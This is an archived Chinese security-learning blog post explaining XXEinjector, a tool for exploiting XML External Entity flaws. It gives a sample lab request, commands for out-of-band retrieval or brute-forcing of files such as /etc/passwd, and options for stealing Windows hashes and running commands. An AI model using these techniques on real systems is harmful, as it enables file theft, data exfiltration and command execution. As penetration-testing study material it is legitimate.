<!DOCTYPE html>
<html lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no">
<meta name="author" content="sh4douu">



<meta name="description" content="一、XXE Payload Cheatsheethttps://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection 二、XXEinjector工具0x00 XXEinjecto">
<meta name="keywords" content="XXE,Tools,Payload,Cheatsheet">
<meta property="og:type" content="article">
<meta property="og:title" content="XXE漏洞利用工具及其资源">
<meta property="og:url" content="https://sakuxa.com/2019/03/04/xxe-tool/index.html">
<meta property="og:site_name" content="IT技术学习分享自留地">
<meta property="og:description" content="一、XXE Payload Cheatsheethttps://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection 二、XXEinjector工具0x00 XXEinjecto">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-03-22T03:58:09.064Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="XXE漏洞利用工具及其资源">
<meta name="twitter:description" content="一、XXE Payload Cheatsheethttps://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection 二、XXEinjector工具0x00 XXEinjecto">

<link rel="apple-touch-icon" href="/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="IT技术学习分享自留地" type="application/atom+xml">



    <link rel="shortcut icon" href="/LimeWire.png">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">


<link rel="stylesheet" href="/css/style.css">



<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>XXE漏洞利用工具及其资源 | IT技术学习分享自留地</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: false
    }
</script>


    <script> yiliaConfig.jquery_ui = [false]; </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/tx.jpg" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">sh4douu</a></h1>
        </hgroup>

        
        <p class="header-subtitle">努力成为自己认可的黑客...</p>
        

        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="/about/" title="Email"></a>
                            
                                <a class="fa GitHub" href="https://github.com/sh4douu" title="GitHub"></a>
                            
                                <a class="fa 微信" href="/about/" title="微信"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/">CTF</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Cheatsheet/">Cheatsheet</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Getshell/">Getshell</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/HTML文档解析/">HTML文档解析</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Language/">Language</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/MySQL/">MySQL</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/OWASP-Top10-2017/">OWASP Top10 2017</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP/">PHP</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHPCMSv9/">PHPCMSv9</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Payload/">Payload</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Python基础/">Python基础</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SQL注入/">SQL注入</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Tools/">Tools</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/WEB安全/">WEB安全</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XML/">XML</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XML注入/">XML注入</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XSS/">XSS</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XXE/">XXE</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/任意文件下载/">任意文件下载</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/干货/">干货</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/必会技能/">必会技能</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/技术/">技术</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/收集/">收集</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/文件上传/">文件上传</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/文件包含/">文件包含</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/文件权限/">文件权限</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/暴力破解/">暴力破解</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/权限提升/">权限提升</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/环境搭建/">环境搭建</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/编码与解码/">编码与解码</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/过滤与绕过/">过滤与绕过</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/靶场/">靶场</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/靶机/">靶机</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" href="https://hexo.io">Hexo</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://pages.github.com/">GitHub</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://moxfive.xyz/">MOxFIVE</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">致力于网络安全</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">sh4douu</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/tx.jpg" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">sh4douu</a></h1>
            </hgroup>
            
            <p class="header-subtitle">努力成为自己认可的黑客...</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="/about/" title="Email"></a>
                            
                                <a class="fa GitHub" target="_blank" href="https://github.com/sh4douu" title="GitHub"></a>
                            
                                <a class="fa 微信" target="_blank" href="/about/" title="微信"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="标签" friends="友情链接" about="关于我">
</nav>
      <div class="body-wrap"><article id="post-xxe-tool" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2019/03/04/xxe-tool/" class="article-date">
      <time datetime="2019-03-04T08:02:01.000Z" itemprop="datePublished">2019-03-04</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      XXE漏洞利用工具及其资源
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
    <div class="article-category tagcloud">
    <a class="article-category-link" href="/categories/WEB漏洞学习/">WEB漏洞学习</a>
    </div>


        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Cheatsheet/">Cheatsheet</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Payload/">Payload</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Tools/">Tools</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/XXE/">XXE</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h2 id="一、XXE-Payload-Cheatsheet"><a href="#一、XXE-Payload-Cheatsheet" class="headerlink" title="一、XXE Payload Cheatsheet"></a>一、XXE Payload Cheatsheet</h2><p><a href="https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html" target="_blank" rel="noopener">https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html</a></p>
<p><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection" target="_blank" rel="noopener">https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection</a></p>
<h2 id="二、XXEinjector工具"><a href="#二、XXEinjector工具" class="headerlink" title="二、XXEinjector工具"></a>二、XXEinjector工具</h2><h3 id="0x00-XXEinjector概述"><a href="#0x00-XXEinjector概述" class="headerlink" title="0x00 XXEinjector概述"></a>0x00 XXEinjector概述</h3><p>XXEinjector 是一款XXE Fuzz漏洞利用工具。</p>
<p>XXEinjector 用于检索（爆破）存在XXE漏洞的目标服务器的文件或目录。</p>
<p>XXEinjector 可以使用直接检索和带外的方式。</p>
<a id="more"></a>
<p>XXEinjector 的目录遍历（<code>--path</code>）只能用于Java应用程序。其他类型的应用程序只能使用爆破（<code>--brute</code>）的方法。</p>
<p>带外方式要求目标主机可以访问我们指定的主机（<code>--host</code>），因为采用带外方式时目标主机需要从我们指定的IP上获取恶意dtd文件，以及会将检索到的文件以FTP传输的方式传输到该IP上。（XXEinjector会自动运行WEB服务以及恶意dtd文件以及FTP服务器。）</p>
<p>工具地址：<a href="https://github.com/enjoiz/XXEinjector" target="_blank" rel="noopener">https://github.com/enjoiz/XXEinjector</a></p>
<h3 id="0x01-基本重要参数使用方法"><a href="#0x01-基本重要参数使用方法" class="headerlink" title="0x01 基本重要参数使用方法"></a>0x01 基本重要参数使用方法</h3><p><code>--file</code>：这个参数是必选项，用于指定一个HTTP Request消息的文件。HTTP请求文件中要包含XML，或者可以使用”XXEINJECT”来标记注入点。</p>
<blockquote>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&gt; POST /pikachu/vul/xxe/xxe_1.php HTTP/1.1</span><br><span class="line">&gt; Host: 192.168.199.111</span><br><span class="line">&gt; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0</span><br><span class="line">&gt; Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8</span><br><span class="line">&gt; Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">&gt; Accept-Encoding: gzip, deflate</span><br><span class="line">&gt; Referer: http://192.168.199.111/pikachu/vul/xxe/xxe_1.php</span><br><span class="line">&gt; Content-Type: application/x-www-form-urlencoded</span><br><span class="line">&gt; Content-Length: 30</span><br><span class="line">&gt; Connection: close</span><br><span class="line">&gt; Upgrade-Insecure-Requests: 1</span><br><span class="line">&gt; </span><br><span class="line">&gt; xml=XXEINJECT&amp;submit=%E6%8F%90%E4%BA%A4</span><br><span class="line">&gt;</span><br></pre></td></tr></table></figure>
</blockquote>
<p><code>--path</code>：指定要遍历的目录或文件。遍历目录只适用于Java应用程序。若是单一文件，则哪种程序都可以用。爆破文件则应使用参数<code>--brute</code>。</p>
<blockquote>
<p><code>--path=/etc</code></p>
<p><code>--path=s://test.txt</code></p>
</blockquote>
<p><code>--brute</code>：该选项用于爆破文件，用于指定包含<code>文件路径</code>的字典文件。结果在<code>brute.log</code>文件中。</p>
<blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&gt; s://test.txt</span><br><span class="line">&gt; s://test1.txt</span><br><span class="line">&gt; /etc/passwd</span><br><span class="line">&gt;</span><br></pre></td></tr></table></figure>
</blockquote>
<p><strong>工具包含直接和带外两种检索文件的方式。</strong></p>
<p><strong>默认是带外方式：</strong></p>
<p><code>--oob=ftp/http/gopher</code>：带外方式提供ftp(默认)、http、gopher三种协议。</p>
<blockquote>
<ul>
<li>ftp协议适用于任意类型WEB程序。</li>
<li>http、gopher协议只适用于Java &lt; 1.7的Java WEB应用程序。</li>
</ul>
</blockquote>
<p><code>--host</code>：采用带外方式时，必选项。用于指定反连接IP。目标主机会从该IP获取恶意dtd文件，以及会将我们要获取的文件发到该IP的ftp上。</p>
<p><code>--httpport</code>：<code>--host</code>指定的主机监听的WEB服务端口。默认80</p>
<p><code>--ftpport</code>：<code>--host</code>指定的主机监听的FTP服务端口。默认21</p>
<p><strong>直接方式</strong></p>
<p><code>--direct</code>：表示采用直接方式。还需要用一个独特的字符串作为该参数的值，具体看参数解释。</p>
<p><strong>其他参数：</strong></p>
<p><code>--verbose</code>：显示详细信息，可以显示攻击数据包等。推荐使用。</p>
<p><code>--phpfilter</code>：使用PHP filter对检索文件进行Base64编码。</p>
<p><code>--ssl</code>：用于https站点。</p>
<p><code>--expect</code>：使用 PHP expect 扩展执行系统命令。</p>
<p><code>--output</code>：<code>--brute</code>输出结果保留的文件。</p>
<h3 id="0x03-使用实例"><a href="#0x03-使用实例" class="headerlink" title="0x03 使用实例"></a>0x03 使用实例</h3><ul>
<li><code>ruby XXEinjector.rb --file=req.txt --host=192.168.1.1 --path=s://test.txt --verbose --phpfilter</code></li>
</ul>
<blockquote>
<p>结果在Logs\IP\目录下。</p>
</blockquote>
<ul>
<li><code>ruby XXEinjector.rb --file=req.txt --host=192.168.1.1 --brute=filepath.txt --verbose --phpfilter --ssl</code></li>
</ul>
<blockquote>
<p>结果在brute.log文件中。</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line">--host	    必选项 - our IP address for reverse connections. (--host=192.168.0.2)</span><br><span class="line">--file	    必选项 - 包含XML的HTTP Request文件。你也可以在请求文件中用&quot;XXEINJECT&quot;来标记的注入点。                      (--file=/tmp/req.txt)</span><br><span class="line"></span><br><span class="line">--path	    如果要枚举目录，这是必选项 - 要枚举的目录路径。 (--path=/etc)</span><br><span class="line">--brute	    如果要枚举文件，这是必选项 - 包含要枚举的文件路径的字典文件。 (--brute=/tmp/brute.txt)</span><br><span class="line">--logger    Log results only. Do not send requests. HTTP logger looks for &quot;p&quot; parameter with             results.</span><br><span class="line">  </span><br><span class="line">--rhost	    目标主机的IP或者域名. 只有在Request文件中没用HOST头部时才使用. (--rhost=192.168.0.3)</span><br><span class="line">--rport	    目标主机的端口. 只有在Request文件中没用HOST头部时才使用，没有默认值. (--rport=8080)</span><br><span class="line"></span><br><span class="line">--oob	    带外漏洞利用方法. FTP是默认的方法且FTP可以用于任意WEB程序中.HTTP只能用于爆破Java &lt; 1.7             的WEB程序的文件或目录. Gopher只能用于爆破Java &lt; 1.7的WEB程序的文件或目录. (--                     oob=http/ftp/gopher)</span><br><span class="line"></span><br><span class="line">--direct	直接利用漏洞而不是带外方法. Unique mark should be specified as a value for this                 argument. This mark specifies where results of XXE start and end. Specify --xml               to see how XML in request file should look like. (--direct=UNIQUEMARK)</span><br><span class="line"></span><br><span class="line">--cdata	    Improve direct exploitation with CDATA. Data is retrieved directly, however OOB               is used to construct CDATA payload. Specify --cdata-xml to see how request should             look like in this technique.</span><br><span class="line"></span><br><span class="line">--2ndfile	File containing valid HTTP request used in second order exploitation. </span><br><span class="line">			(--2ndfile=/tmp/2ndreq.txt)</span><br><span class="line"></span><br><span class="line">--phpfilter	使用PHP filter对文件进行Base64编码.</span><br><span class="line">--netdoc    使用netdoc协议而不是file协议。 (Java).</span><br><span class="line">--enumports	Enumerating unfiltered ports for reverse connection. Specify value &quot;all&quot; to     			enumerate all TCP ports. (--enumports=21,22,80,443,445)</span><br><span class="line"></span><br><span class="line">--hashes	窃取Windows哈希值.</span><br><span class="line">--expect	使用 PHP expect 扩展执行系统命令. (--expect=ls)</span><br><span class="line">--upload	Uploads specified file using Java jar schema into temp file. (--                              upload=/tmp/upload.txt)</span><br><span class="line"></span><br><span class="line">--xslt	    Tests for XSLT injection.</span><br><span class="line"></span><br><span class="line">--ssl	    Use SSL.</span><br><span class="line">--proxy	    Proxy to use. (--proxy=127.0.0.1:8080)</span><br><span class="line">--httpport	   Set custom HTTP port. (--httpport=80)</span><br><span class="line">--ftpport	   Set custom FTP port. (--ftpport=21)</span><br><span class="line">--gopherport   Set custom gopher port. (--gopherport=70)</span><br><span class="line">--jarport	   Set custom port for uploading files using jar. (--jarport=1337)</span><br><span class="line">--xsltport	   Set custom port for XSLT injection test. (--xsltport=1337)</span><br><span class="line"></span><br><span class="line">--test	    该参数用于测试校验Payload。会将发送的Payload显示出来而不会发送到目标主机。</span><br><span class="line"></span><br><span class="line">--urlencode	URL encode injected DTD. This is default for URI.</span><br><span class="line">--nodtd	     该参数用于想使用自己提供的dtd文件时，工具默认会生成并使用dtd文件。使用&quot;--dtd&quot;可以看dtd              文件格式。</span><br><span class="line"></span><br><span class="line">--output	爆破的结果输出到的文件。 默认情况下爆破的结果存放在brute.log文件中</span><br><span class="line">			(--output=/tmp/out.txt)</span><br><span class="line"></span><br><span class="line">--timeout	    Timeout for receiving file/directory content. (--timeout=20)</span><br><span class="line">--contimeout	Timeout for closing connection with server. This is used to prevent DoS                        condition. (--contimeout=20)</span><br><span class="line"></span><br><span class="line">--fast	    Skip asking what to enumerate. Prone to false-positives.</span><br><span class="line">--verbose	    Show verbose messages.</span><br></pre></td></tr></table></figure>
<h2 id="0x03-XXE学习资源"><a href="#0x03-XXE学习资源" class="headerlink" title="0x03 XXE学习资源"></a>0x03 XXE学习资源</h2><p><a href="https://nosec.org/home/detail/2139.html" target="_blank" rel="noopener">https://nosec.org/home/detail/2139.html</a></p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2019/03/04/xxe-tool/">XXE漏洞利用工具及其资源</a></p>
        <p><span>文章作者:</span><a href="/" title="回到主页">sh4douu</a></p>
        <p><span>发布时间:</span>2019-03-04, 16:02:01</p>
        <p><span>最后更新:</span>2019-03-22, 11:58:09</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2019/03/04/xxe-tool/" title="XXE漏洞利用工具及其资源">https://sakuxa.com/2019/03/04/xxe-tool/</a>
            <span class="copy-path" data-clipboard-text="原文: https://sakuxa.com/2019/03/04/xxe-tool/　　作者: sh4douu" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target="_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2019/03/05/文件上传漏洞/">
                    文件上传漏洞（File Upload）
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2019/03/01/XXE/">
                    XXE（XML External Entity）漏洞
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">文章目录</strong>
        
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#一、XXE-Payload-Cheatsheet"><span class="toc-number">1.</span> <span class="toc-text">一、XXE Payload Cheatsheet</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#二、XXEinjector工具"><span class="toc-number">2.</span> <span class="toc-text">二、XXEinjector工具</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x00-XXEinjector概述"><span class="toc-number">2.1.</span> <span class="toc-text">0x00 XXEinjector概述</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x01-基本重要参数使用方法"><span class="toc-number">2.2.</span> <span class="toc-text">0x01 基本重要参数使用方法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x03-使用实例"><span class="toc-number">2.3.</span> <span class="toc-text">0x03 使用实例</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-XXE学习资源"><span class="toc-number">3.</span> <span class="toc-text">0x03 XXE学习资源</span></a></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-3 i,
        .toc-level-3 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="隐藏目录" title="点击按钮隐藏或者显示文章目录">

    <script>
        yiliaConfig.toc = ["隐藏目录", "显示目录", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"XXE漏洞利用工具及其资源　| IT技术学习分享自留地　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>







    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2019/03/05/文件上传漏洞/" title="上一篇: 文件上传漏洞（File Upload）">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2019/03/01/XXE/" title="下一篇: XXE（XML External Entity）漏洞">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/03/21/WEB漏洞靶场pikachu-xss/">WEB漏洞靶场Pikachu Writeup Chapter 2：XSS</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/19/05python基础学习系列之文件/">Python基础学习系列Chapter 6：文件</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/19/04python基础学习系列之集合/">Python基础学习系列Chapter 5：集合</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/19/03python基础学习系列之字典/">Python基础学习系列Chapter 4：字典</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/19/02python基础学习系列之列表/">Python基础学习系列Chapter 3：列表</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/19/WEB漏洞靶场pikachu—writeup/">WEB漏洞靶场Pikachu Writeup Chapter 1：表单暴力破解</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/18/01python基础学习系列之字符串/">Python基础学习系列Chapter 2：字符串</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/18/00python基础学习系列之动态类型/">Python基础学习系列Chapter 1：动态类型</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/15/记一次面试某安全公司一道XXE漏洞CTF面试题/">记一次面试某安全公司一道XXE漏洞CTF面试题</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/12/0x00-SQL注入系列之Mysql基础知识/">SQL注入系列Chapter 1：MySQL基础知识</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/11/0x02-XSS学习系列之练习靶场01/">XSS学习系列Chapter 3：prompt(1) XSS挑战</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/11/0x01-XSS学习系列之漏洞原理/">XSS学习系列Chapter 2：漏洞原理</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/07/0x00-XSS学习系列之解析HTML文档/">XSS学习系列Chapter 1：浏览器解析HTML文档</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/05/文件上传漏洞/">文件上传漏洞（File Upload）</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/04/xxe-tool/">XXE漏洞利用工具及其资源</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/01/XXE/">XXE（XML External Entity）漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/28/xml/">XML基本知识学习</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/28/文件与目录权限/">文件与目录权限</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/26/hack-zico/">Vulnhub靶机渗透笔记——Zico2</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/25/phpcms9-6-1/">PHPCMSv9.6.1任意文件下载漏洞复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/22/GitNote/">Git基本命令及使用</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/22/干货杂项收集/">干货杂项收集</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/21/build-blog/">博客搭建记录 Node.js + Hexo + Yelee + Git Pages</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2019 sh4douu
            </div>
            <div class="footer-right">
